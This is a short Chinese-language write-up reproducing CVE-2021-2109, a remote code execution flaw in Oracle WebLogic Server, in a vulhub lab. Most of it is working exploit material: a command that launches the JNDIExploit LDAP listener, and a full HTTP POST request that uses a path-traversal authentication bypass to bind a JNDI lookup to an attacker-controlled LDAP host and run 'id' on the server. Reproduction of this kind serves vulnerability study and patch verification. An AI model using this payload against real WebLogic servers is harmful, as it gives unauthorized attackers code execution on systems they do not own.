CVE-2021-2109 Weblogic Server远程代码执行漏洞复现
只为复现
影响版本
Weblogic Server 10.3.6.0.0
Weblogic Server 12.1.3.0.0
Weblogic Server 12.2.1.3.0
Weblogic Server 12.2.1.4.0
Weblogic Server 14.1.1.0.0
环境搭建
直接用‘.\vulhub-master\weblogic\CVE-2020-14882’漏洞环境即可
https://github.com/vulhub/vulhub
java version “1.8.0_151”
WebLogic Server 版本: 12.2.1.3.0
启动ldap监听
github地址
https://github.com/feihong-cs/JNDIExploit
java -jar JNDIExploit-v1.11.jar -i 10.10.10.10
发送payload
由于此版本为CVE-2020-14882、CVE-2020-14883未授权漏洞版本,可结合未授权漏洞验证而无需登录
POST /console/css/%252e%252e%252f/consolejndi.portal HTTP/1.1
Host: 10.10.99.196:7001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Cookie: ADMINCONSOLESESSION=QOBObrqaFesoHZn2CPYDDiURPTylOq28vVljbn-u242XLuXB8bNP!-1825720843
cmd:id
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 175
_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://10.10.10.10;10:1389/Basic/WeblogicEcho;AdminServer%22)
注意ldap://10.10.10.10;10:1389(";"是分号不是“.”d)
收到请求
参考连接:
https://mp.weixin.qq.com/s/ls9Qo4uBE-V0zaNx6_TLuA
https://www.o2oxy.cn/3019.html